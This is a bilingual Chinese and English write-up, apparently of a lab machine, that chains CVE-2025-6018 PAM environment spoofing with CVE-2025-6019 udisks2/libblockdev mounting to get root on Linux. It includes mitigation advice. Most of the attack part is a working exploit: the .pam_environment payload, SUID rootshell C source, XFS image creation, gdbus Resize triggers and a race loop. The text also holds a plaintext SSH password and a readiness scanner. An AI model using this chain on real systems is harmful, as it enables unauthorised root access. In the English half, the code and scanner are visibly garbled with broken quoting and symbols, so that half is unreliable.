Linux 复合提权链 (CVE-2025-6018 & CVE-2025-6019)

前提

1. 身份伪装的前提 (针对 CVE-2025-6018)

这是“接力赛”的第一棒，目的是让系统把你从“外来客”识别为“本地人”。

必须是 Systemd 系统：目标必须使用 systemd-logind (Systemd Login Manager，Systemd 登录管理器) 来管理会话。
PAM 环境配置权限：你必须对当前用户的家目录有写权限，因为需要创建或修改 ~/.pam_environment 文件。
PAM 模块加载：目标系统必须启用了 pam_systemd.so (Pluggable Authentication Modules for Systemd，Systemd 的可插拔身份验证模块)。
重新读取环境：你必须能够触发一次新的会话登录（比如通过 ssh 重新登录或者执行 su - 用户名），以便让系统读取你投毒后的环境变量。

2. 授权许可的前提 (Polkit 的信任)

这是连接两个漏洞的“桥梁”。没有这一步，你无法调用后续的磁盘管理功能。

Active 状态：通过 loginctl (Login Control，登录控制工具) 查看时，Active 属性必须为 yes。
Seat 绑定：会话必须关联到一个具体的 Seat（席位），通常是 seat0 (The primary hardware seat，主硬件席位)。
Polkit 策略允许：系统的 Polkit (PolicyKit，系统级权限管理工具包) 策略必须配置为：允许“本地活跃用户”在无需管理员密码的情况下通过 udisks2 (User-space Disk Management Daemon，用户空间磁盘管理守护程序) 操作磁盘。

3. 漏洞触发的前提 (针对 CVE-2025-6019)

这是“接力赛”的终点，真正完成从普通用户到 Root (超级用户) 的跨越。

存在漏洞的库：系统中安装的 libblockdev (Block Device Manipulation Library，块设备操作库) 版本必须在受影响范围内（未打补丁）。
内核支持 XFS：Linux 内核必须加载了 XFS (Extents File System，扩展文件系统) 驱动，否则无法挂载你的恶意镜像。
udisks2 服务运行：系统必须运行着 udisks2 守护程序，并且允许你通过 D-Bus (Desktop Bus，桌面总线) 调用它的 Resize (调整大小) 方法。
可写的 /tmp 目录：虽然不是绝对，但漏洞利用通常依赖在 /tmp 目录下创建临时挂载点，且该目录不能有 noexec (禁止执行) 限制。
镜像完整性：你必须拥有一个在本地预先制作好的、带有 SUID (Set User ID，设置用户 ID) 权限二进制文件的 XFS 镜像。

漏洞基本信息

1. 漏洞基本信息 (Vulnerability Overview)

CVE-2025-6018:
- 名称: PAM 环境变量注入漏洞 (Pluggable Authentication Modules Environment Injection)
- 类型: 逻辑缺陷 / 身份伪装
- 影响范围: 主要影响 SUSE 系列及配置不当的 Linux 发行版。
CVE-2025-6019:
- 名称: libblockdev / udisks2 逻辑漏洞
- 类型: 本地权限提升 (LPE - Local Privilege Escalation)
- 风险等级: 高 (High)

2. 漏洞核心原理 (Root Cause Analysis)

CVE-2025-6018 (突破点): 系统中的 pam_env.so (Pluggable Authentication Modules Environment Library) 模块配置了 user_readenv=1。这允许普通用户通过修改家目录下的 ~/.pam_environment 文件注入特定的环境变量。
- 关键变量: XDG_SEAT (X Display Group Seat) 和 XDG_VTNR (X Display Group Virtual Terminal Number)。
- 后果: 成功欺骗 Polkit (PolicyKit) 模块，使远程会话被误判为“本地活跃会话” (Active Local Session)，从而获得执行敏感系统操作的权限。
CVE-2025-6019 (提权点): libblockdev (Block Device Manipulation Library) 在处理 XFS (Extents File System) 文件系统缩放请求时，通过 udisks2 (User-space Disk Management Daemon) 挂载临时镜像。
- 缺陷: 挂载过程中未设置 MS_NOSUID (Mount Flag: No Set User ID) 标志。
- 后果: 允许用户挂载包含攻击者构造的 SUID (Set User ID) 程序的文件系统镜像。

3. 提权攻击链构造 (Exploitation Chain)

这一部分是笔记的精华，记录如何将两者串联：

环境准备: 在 $HOME 创建 .pam_environment，写入伪造的本地席位信息。
会话重置: 触发 PAM (Pluggable Authentication Modules) 会话重新加载（如通过 SSH 重连）。
权限校验: 确认 loginctl (Login Control) 将当前用户标记为 Active=yes。
载荷投放: 准备一个恶意的 XFS (Extents File System) 磁盘镜像，内部包含一个具备 SUID (Set User ID) 权限的 Shell。
触发执行: 使用 udisksctl (User-space Disk Control Tool) 请求修改该镜像大小，系统会自动挂载该镜像，此时执行其中的 SUID 程序即可获取 Root (超级用户) 权限。

4. 渗透测试检查清单 (Pentest Checklist)

检查 /etc/pam.d/ 下是否存在 user_readenv=1。（如果没有，跳过尝试第二步）
检查是否存在 ~/.pam_environment 的写权限。（检查env）
检查 pkexec (PolicyKit Execution) 或 udisksctl (User-space Disk Control Tool) 是否可用。
检查 libblockdev (Block Device Manipulation Library) 版本是否低于安全补丁版本。

5. 修复与防御 (Mitigation & Defense)

短期策略: 修改 PAM (Pluggable Authentication Modules) 配置，设置 user_readenv=0。
长期策略: 更新系统内核及 libblockdev、udisks2 关键库。
审计建议: 监控 ~/.pam_environment 文件的异常修改记录。

实例

利用CVE-2025-6018

phileasfogg3@pterodactyl:~> cat .pam_environment

XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1

重新登录ssh

phileasfogg3@pterodactyl:~> env | grep XDG
XDG_VTNR=1
XDG_SESSION_ID=184
XDG_SESSION_TYPE=tty
XDG_DATA_DIRS=/usr/share
XDG_SESSION_CLASS=user
XDG_SEAT=seat0
XDG_RUNTIME_DIR=/run/user/1002
XDG_CONFIG_DIRS=/etc/xdg

检查SEAT是否为seat0，以及STATE是否为active

phileasfogg3@pterodactyl:~> loginctl --no-pager
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no

1 sessions listed.

确认Polkit门票

phileasfogg3@pterodactyl:~> pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ && echo "VULNERABLE: Polkit is bypassed!"

VULNERABLE: Polkit is bypassed!

如果它没有弹出密码输入提示，且直接打印了 VULNERABLE，那么已经拿到了 CVE-2025-6019 的提权通行证。

利用CVE-2025-6019

第一步：在攻击机上制作恶意 XFS 镜像

# 1. 创建一个 300MB 的空镜像文件
dd if=/dev/zero of=xfs.image bs=1M count=300

# 2. 格式化为 XFS (Extents File System，扩展文件系统)
mkfs.xfs xfs.image

# 3. 挂载镜像并植入 SUID Shell 包装器
mkdir -p ./mnt
sudo mount -o loop xfs.image ./mnt

# 4. 编写并编译一个简单的 SUID 提权程序（比直接拷贝 bash 更稳定）
cat << EOF > rootshell.c
#include <unistd.h>
#include <stdlib.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc rootshell.c -o ./mnt/rootshell

# 5. 设置关键的 SUID (Set User ID) 权限
sudo chmod 4755 ./mnt/rootshell

# 6. 卸载镜像
sudo umount ./mnt
rm rootshell.c

sudo执行上述文件上传到目标：sshpass -p '!QAZ2wsx' scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/

第二步：在目标机上触发提权

# 1. 进入 /tmp 目录
cd /tmp

# 2. 设置回环设备 (Loop Device)
# udisksctl: User-space Disk Control Tool (用户空间磁盘控制工具)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
echo "Loop Device: $LOOP_DEV"

# 3. 触发漏洞：利用 gdbus 调用 Resize 方法
# 这会强制 libblockdev (Block Device Manipulation Library) 以含有漏洞的方式挂载镜像
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

# 4. 寻找挂载点并运行提权程序
# 漏洞触发后，镜像会被挂载在 /tmp/blockdev-xxxx 下
MOUNT_PATH=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
if [ -z "$MOUNT_PATH" ]; then
    echo "[-] Mount failed, check if you are an Active session."
else
    echo "[+] Found mount at: $MOUNT_PATH"
    $MOUNT_PATH/rootshell
fi

第三步：开启抢夺循环

# 1. 开启极其密集的后台抢夺器
(while true; do 
    target=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
    if [ -n "$target" ]; then
        echo "[!] MOUNT DETECTED: $target"
        $target/rootshell
        break
    fi
done) &

# 2. 获取抢夺器的进程 ID
SNATCHER_PID=$!

# 3. 重新设置循环设备 (假设使用你上传的镜像)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')

# 4. 触发漏洞（多次触发增加成功率）
for i in {1..3}; do
    gdbus call --system --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
done

# 5. 如果成功，你会进入 Root Shell；如果不成功，杀掉抢夺器
kill $SNATCHER_PID 2>/dev/null

最后

phileasfogg3@pterodactyl:/tmp> find /tmp/blockdev.* -name "rootshell" -perm -4000 2>/dev/null
/tmp/blockdev.38YCK3/rootshell
phileasfogg3@pterodactyl:/tmp> /tmp/blockdev.38YCK3/rootshell -p
pterodactyl:/tmp # id
uid=0(root) gid=0(root) groups=0(root),100(users)
·1pterodactyl:/tmp # cat /root/root.txt

检测

#!/bin/bash

# --- 颜色定义 ---
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # 无颜色 (No Color)

echo -e "${BLUE}====================================================${NC}"
echo -e "${BLUE}       NeobeeSec 提权前置环境综合扫描器             ${NC}"
echo -e "${BLUE}====================================================${NC}"

# 1. 系统基础信息采集
echo -e "\n${YELLOW}[1] 系统基础信息 (System Information)${NC}"
echo -e "主机名: $(hostname)"
echo -e "内核版本 (Kernel Version): $(uname -r)"
if [ -f /etc/os-release ]; then
    # 全称: Operating System Release (操作系统发行版信息)
    source /etc/os-release
    echo -e "发行版本: $PRETTY_NAME"
fi

# 2. CVE-2025-6018 状态检查 (身份伪装检查)
echo -e "\n${YELLOW}[2] CVE-2025-6018 身份伪装状态 (Environment Poisoning)${NC}"

# 检查环境变量
# 全称: X Display Group Seat (X 显示组席位)
echo -n "XDG_SEAT 状态: "
if [[ "$XDG_SEAT" == "seat0" ]]; then
    echo -e "${GREEN}已设置为 seat0 (符合攻击条件)${NC}"
else
    echo -e "${RED}未设置或非 seat0 (当前值: $XDG_SEAT)${NC}"
fi

# 检查会话活跃度
# 全称: Login Control (登录控制工具)
if command -v loginctl &>/dev/null; then
    ACTIVE_STATUS=$(loginctl show-session "$XDG_SESSION_ID" --property=Active --value 2>/dev/null)
    echo -e "会话活跃状态 (Active Status): ${ACTIVE_STATUS:-Unknown}"
    if [[ "$ACTIVE_STATUS" == "yes" ]]; then
        echo -e "[${GREEN}√${NC}] 会话已激活，Polkit [PolicyKit] 将信任此会话。"
    else
        echo -e "[${RED}!${NC}] 会话非活跃，可能无法调用特权 D-Bus [Desktop Bus] 方法。"
    fi
else
    echo -e "${RED}[x] 找不到 loginctl 工具${NC}"
fi

# 3. 核心库与组件检查
echo -e "\n${YELLOW}[3] 关键组件与包版本 (Software Packages)${NC}"

# 检查工具是否存在
components=("udisksctl" "gdbus" "pkcheck")
for cmd in "${components[@]}"; do
    if command -v "$cmd" &>/dev/null; then
        echo -e "[${GREEN}√${NC}] 发现工具: $cmd"
    else
        echo -e "[${RED}x${NC}] 缺失工具: $cmd"
    fi
done

# 深度检查包版本 (支持 RPM 和 DPKG)
# 全称: Red Hat Package Manager (红帽包管理器)
# 全称: Debian Package (Debian 包管理系统)
check_pkgs=("libblockdev" "udisks2" "polkit" "systemd")

if command -v rpm &>/dev/null; then
    echo -e "\n--- 基于 RPM 的包版本查询 ---"
    for pkg in "${check_pkgs[@]}"; do
        rpm -qa | grep -i "$pkg" | sed "s/^/[+] /"
    done
elif command -v dpkg &>/dev/null; then
    echo -e "\n--- 基于 DPKG 的包版本查询 ---"
    for pkg in "${check_pkgs[@]}"; do
        dpkg -l | grep -i "$pkg" | awk '{print "[+] "$2, $3}'
    done
fi

# 4. CVE-2025-6019 提权前置检查 (磁盘与挂载)
echo -e "\n${YELLOW}[4] CVE-2025-6019 提权前置 (LPE Prerequisites)${NC}"

# 检查内核对 XFS 的支持
# 全称: Extents File System (扩展文件系统)
if grep -q "xfs" /proc/filesystems; then
    echo -e "[${GREEN}√${NC}] 内核支持 XFS 文件系统。"
else
    echo -e "[${RED}x${NC}] 内核不支持 XFS，无法挂载提权镜像。${NC}"
fi

# 检查 /tmp 目录执行权限
# 全称: Standard Output (标准输出)
# 全称: Mount (挂载指令)
if mount | grep -E '\s/tmp\s' | grep -q "noexec"; then
    echo -e "[${RED}x${NC}] /tmp 目录被挂载为 noexec (禁止执行)，提权程序可能无法运行。"
else
    echo -e "[${GREEN}√${NC}] /tmp 目录允许执行程序。"
fi

# 5. 权限漏洞盲测 (Polkit 授权检查)
echo -e "\n${YELLOW}[5] Polkit [PolicyKit] 授权盲测${NC}"
# 检查是否可以直接利用 udisks2 (User-space Disk Management Daemon) 挂载权限
if command -v pkcheck &>/dev/null; then
    pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ &>/dev/null
    if [ $? -eq 0 ]; then
        echo -e "[${GREEN}√${NC}] 授权成功: 你可以直接挂载文件系统！"
    else
        echo -e "[${RED}x${NC}] 授权失败: 挂载操作需要管理员密码。"
    fi
fi

echo -e "\n${BLUE}====================================================${NC}"
echo -e "扫描完成。如果以上带 [√] 的项目较多，说明提权成功率极高。"

Linux Multi-Stage Privilege Escalation Chain (CVE-2025-6018 & CVE-2025-6019)

Prerequisites

1. Prerequisites for Identity Spoofing (CVE-2025-6018)

This is the first step in the “relay race,” aimed at making the system recognize you as a local user rather than an outsider:

Systemd Required: The target must be using systemd-logind (the Systemd login manager) to manage sessions.
PAM Permissions: You need write access to the current user’s home directory to create or modify the ~/.pam_environment file.
PAM Module Loading: The target system must have the pam_systemd.so module enabled.
Environment Re-reading: You must be able to trigger a new session login (e.g., via ssh or su - username) so that the system reads the environment variables you have poisoned.

2. Prerequisites for Authorization (Polkit Trust)

This step acts as a bridge between the two vulnerabilities; without it, you cannot proceed with the disk management functions:

Active Status: The Active attribute must be set to yes when viewed using loginctl.
Seat Binding: The session must be associated with a specific Seat (usually seat0, the primary hardware seat).
Polkit Policy: The system’s Polkit policy must allow local active users to operate the disk via udisks2 without requiring an administrator password.

3. Prerequisites for Vulnerability Exploitation (CVE-2025-6019)

This is the final step in the “relay race,” completing the transition from a regular user to Root (superuser):

Vulnerable Library: The installed version of libblockdev must be within the affected range (unpatched).
Kernel XFS Support: The Linux kernel must have the XFS driver loaded; otherwise, your malicious image cannot be mounted.
udisks2 Service Running: The udisks2 daemon must be running, and you must have access to call its Resize method via D-Bus.
** writable /tmp Directory**: Although not absolute, the exploit typically relies on creating a temporary mount point in /tmp, which should not have the noexec restriction.
Image Integrity: You need an XFS image with a pre-created binary file that has SUID (Set User ID) privileges.

Vulnerability Details

1. Vulnerability Overview (CVE-2025-6018):

Name: PAM Environment Variable Injection Vulnerability
Type: Logical flaw/Identity spoofing
Impact: Primarily affects SUSE series and improperly configured Linux distributions.

2. Vulnerability Overview (CVE-2025-6019):

Name: libblockdev/udisks2 Logical Vulnerability
Type: Local Privilege Escalation (LPE)
Risk Level: High

2. Core Principles of the Vulnerabilities (Root Cause Analysis)

CVE-2025-6018 (Vulnerability Point): The pam_env.so (Pluggable Authentication Modules Environment Library) in the system is configured with user_readenv=1. This allows regular users to inject specific environment variables by modifying the ~/.pam_environment file in their home directories.
- Key Variables: XDG_SEAT (X Display Group Seat) and XDG_VTNR (X Display Group Virtual Terminal Number).
- Consequences: The Polkit module is successfully deceived, causing remote sessions to be misidentified as “Active Local Sessions,” thereby granting the permission to execute sensitive system operations.
CVE-2025-6019 (Privilege Escalation Point): The libblockdev (Block Device Manipulation Library) fails to set the MS_NOSUID (Mount Flag: No Set User ID) during the mounting of temporary images for XFS (Extents File System) file system scaling requests using the udisks2 (User-space Disk Management Daemon).
- Consequences: Users are able to mount file system images containing SUID (Set User ID) programs crafted by the attacker.

3. Construction of the Privilege Escalation Attack Chain (Exploitation Chain)

This section is the essence of the notes, documenting how the two vulnerabilities can be combined:

Environmental Preparation: Create a .pam_environment file in $HOME and write fake local seat information into it.
Session Reset: Trigger a PAM (Pluggable Authentication Modules) session reload, for example, by reconnecting via SSH.
Permission Verification: Verify that loginctl marks the current user as Active=yes.
Payload Deployment: Prepare a malicious XFS (Extents File System) disk image that contains a Shell with SUID (Set User ID) privileges.
Execution Trigger: Use udisksctl (User-space Disk Control Tool) to request a change in the image size; the system will automatically mount the image, and executing the SUID program inside it will grant Root (superuser) privileges.

4. Pentest Checklist

Check if user_readenv=1 is set in /etc/pam.d/. (If not, skip the second step.)
Verify if there are write permissions for the ~/.pam_environment file.
Check if pkexec (PolicyKit Execution) or udisksctl (User-space Disk Control Tool) is available.
Verify if the version of libblockdev (Block Device Manipulation Library) is older than the security patch version.

5. Mitigation & Defense Measures

Short-term Strategy: Modify the PAM (Pluggable Authentication Modules) configuration to set user_readenv=0.
Long-term Strategy: Update the system kernel and the libblockdev and udisks2 libraries.
Audit Recommendation: Monitor for any abnormal modifications to the ~/.pam_environment file.

Example

Exploiting CVE-2025-6018

phileasfogg3@pterodactyl:~> cat .pam_environment
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1

Re-login using SSH:

phileasfogg3@pterodactyl:~> env | grep XDG
XDG_VTNR=1
XDG_SESSION_ID=184
XDG_SESSION_TYPE=tty
XDG_DATA_DIRS=/usr/share
XDG_SESSION_CLASS=user
XDG_SEAT=seat0
XDG_RUNTIME_DIR=/run/user/1002
XDG_CONFIG_DIRS=/etc/xdg

Check if SEAT is set to seat0 and if STATE is active:

phileasfogg3@pterodactyl:~> loginctl --no-pager
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no

1 session listed.

Verify the Polkit vulnerability:

phileasfogg3@pterodactyl:~> pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ && echo "VULNERABLE: Polkit has been bypassed!"
VULNERABLE: Polkit has been bypassed!

If no password prompt appears and the message VULNERABLE is displayed directly, the privilege escalation credential for CVE-2025-6019 has been obtained.


---

## Exploiting CVE-2025-6019

**Step 1:** Create a malicious XFS image on the attacker’s machine:

```bash
# 1. Create a 300MB empty image file
dd if=/dev/zero of=xfs.image bs=1M count=300

# 2. Format the image as XFS (Extents File System)
mkfs.xfs xfs.image

# 3. Mount the image and install a SUID Shell wrapper
mkdir -p ./mnt
sudo mount -o loop xfs.image ./mnt

# 4. Write and compile a simple SUID privilege escalation program (more stable than simply copying bash)
cat << EOF > rootshell.c
#include <unistd.h>
#include <stdlib.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc rootshell.c -o ./mnt/rootshell

# 5. Set the necessary SUID permissions
sudo chmod 4755 ./mnt/rootshell

# 6. Unmount the image
sudo umount ./mnt
rm rootshell.c

Execute the program using sudo:

sshpass -p '!QAZ2wsx' scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/

Step 2: Trigger the privilege escalation on the target machine:

# 1. Navigate to the /tmp directory
cd /tmp

# 2. Set up the loop device
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
echo "Loop Device: $LOOP_DEV"

# 3. Exploit the vulnerability by using gdbus to call the Resize method

This will force libblockdev (the Block Device Manipulation Library) to mount the image in a way that exploits the vulnerability.

gdbus call —system —dest org.freedesktop.UDisks2
—object-path “/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}”
—method org.freedesktop.UDisks2.Filesystem.Resize 0 {}

4. Locate the mount point and execute the privilege escalation program.

After the vulnerability is triggered, the image will be mounted under /tmp/blockdev-xxxx.

MOUNT_PATH= $(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null) if [ -z "$ MOUNT_PATH” ]; then echo ”[-] Mount failed; please check if you are in an active session.” else echo ”[+] Mount point found at: $MOUNT_PATH"$ MOUNT_PATH/rootshell fi


**Step 3: Initiate the hijacking loop**

```bash
# 1. Start an extremely aggressive background hijacker process.
(while true; do 
    target=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
    if [ -n "$target" ]; then
        echo "[!] Hijacking target detected: $target"
        $target/rootshell
        break
    fi
done) &

# 2. Retrieve the process ID of the hijacker.
SNATCHER_PID=$!

# 3. Re-set the loop device (assuming you are using the image you uploaded).
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')

# 4. Trigger the vulnerability multiple times to increase the success rate.
for i in {1..3}; do
    gdbus call --system --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0{}
done

# 5. If successful, you will gain root shell access; otherwise, terminate the hijacker process.
kill $SNATCHER_PID 2>/dev/null

Finally

phileasfogg3@pterodactyl:/tmp> find /tmp/blockdev.* -name "rootshell" -perm -4000 2>/dev/null
/tmp/blockdev.38YCK3/rootshell
phileasfogg3@pterodactyl:/tmp> /tmp/blockdev.38YCK3/rootshell -p
pterodactyl:/tmp # Output: ID of the user with root privileges: uid=0(root), gid=0(root), groups=0(root),100(users)
·1pterodactyl:/tmp # Contents of /root/root.txt

Detection script

#!/bin/bash

--- Color Definitions ---

RED=‘\033[0;31m’ GREEN=‘\033[0;32m’ YELLOW=‘\033[1;33m’ BLUE=‘\033[0;34m’ NC=‘\033[0m’ # No Color

echo -e “ ${BLUE}====================================================$ {NC}” echo -e “ ${BLUE} NeobeeSec Privilege Escalation Pre-Environment Scanner$ {NC}” echo -e “ ${BLUE}====================================================$ {NC}“

1. System Information Collection

echo -e “\n ${YELLOW}[1] System Information$ {NC}” echo -e “Hostname: $(hostname)" echo -e "Kernel Version:$ (uname -r)” if [ -f /etc/os-release ]; then # Full Name: Operating System Release source /etc/os-release echo -e “Release Version: $PRETTY_NAME” fi

2. CVE-2025-6018 Status Check (Environment Poisoning Detection)

echo -e “\n ${YELLOW}[2] CVE-2025-6018 Environment Poisoning Status$ {NC}“

Check Environment Variables

Full Name: X Display Group Seat

echo -n “XDG_SEAT Status: ” if [[ “ $XDG_SEAT" == "seat0" ]]; then echo -e "$ {GREEN}Set to seat0 (Meeting Attack Conditions) ${NC}" else echo -e "$ {RED}Not set or not seat0 (Current Value: $XDG_SEAT)$ {NC}” fi

Check Session Activity

if command -v loginctl &>/dev/null; then ACTIVE_STATUS= $(loginctl show-session "$ XDG_SESSION_ID” —property=Active —value 2>/dev/null) echo -e “Session Activity Status: ${ACTIVE_STATUS:-Unknown}" if [[ "$ ACTIVE_STATUS” == “yes” ]]; then echo -e ”[ ${GREEN}√$ {NC}] Session is active, and Polkit will trust this session.” else echo -e ”[ ${RED}!$ {NC}] Session is inactive, may not be able to call privileged D-Bus methods.” fi else echo -e ”[ ${RED}×$ {NC}] The loginctl tool was not found${NC}” fi

3. Core Libraries and Components Check

echo -e “\n ${YELLOW}[3] Key Components and Package Versions$ {NC}“

Check for the Presence of Required Tools

components=(“udisksctl” “gdbus” “pkcheck”) for cmd in “ ${components[@]}"; do if command -v "$ cmd” &>/dev/null; then echo -e ”[ ${GREEN}√$ {NC}] Tool found: $cmd" else echo -e "[$ {RED}× ${NC}] Tool missing:$ cmd” fi done

Deep Check of Package Versions (Supports RPM and DPKG)

Full Name: Red Hat Package Manager

Full Name: Debian Package Management System

check_pkgs=(“libblockdev” “udisks2” “polkit” “systemd”)

if command -v rpm &>/dev/null; then echo -e “\n--- RPM-Based Package Version Check ---” for pkg in “ ${check_pkgs[@]}"; do rpm -qa | grep -i "$ pkg” | sed “s/^/[+] /” done elif command -v dpkg &>/dev/null; then echo -e “\n--- DPKG-Based Package Version Check ---” for pkg in “ ${check_pkgs[@]}"; do dpkg -l | grep -i "$ pkg” | awk ‘{print ”[+] “ $2,$ 3}” done fi

4. CVE-2025-6019 Privilege Escalation Prerequisites (Disk and Mounting)

echo -e “\n ${YELLOW}[4] CVE-2025-6019 Privilege Escalation Prerequisites$ {NC}“

Check if the kernel supports XFS

Full Name: Extents File System

if grep -q “xfs” /proc/filesystems; then echo -e ”[ ${GREEN}√$ {NC}] The kernel supports the XFS file system.” else echo -e ”[ ${RED}x$ {NC}] The kernel does not support XFS, so the privilege escalation image cannot be mounted.” fi

Check the execution permissions for the /tmp directory

Full Name: Standard Output; Full Name: Mount Command

if mount | grep -E ‘\s/tmp\s’ | grep -q “noexec”; then echo -e ”[ ${RED}x$ {NC}] The /tmp directory is mounted with noexec permissions, which may prevent the privilege escalation script from running.” else echo -e ”[ ${GREEN}√$ {NC}] The /tmp directory allows program execution.” fi

5. Polkit Authorization Vulnerability Test

echo -e “\n ${YELLOW}[5] Polkit Authorization Test$ {NC}“

Check if udisks2 (User-space Disk Management Daemon) permissions can be exploited

if command -v pkcheck &>/dev/null; then pkcheck —action-id org.freedesktop.udisks2.filesystem-mount —process $$ &>/dev/null if [ $? -eq 0 ]; then echo -e "[$ {GREEN}√ ${NC}] Authorization successful: You can mount file systems directly!" else echo -e "[$ {RED}x${NC}] Authorization failed: Mounting requires an administrator password.” fi fi

echo -e “\n ${BLUE}====================================================$ {NC}” echo -e “Scan complete. If there are many items with [√], the probability of privilege escalation is very high.”

linux-复合提权链-cve-2025-6018--cve-2025-6019

linux-复合提权链-cve-2025-6018--cve-2025-6019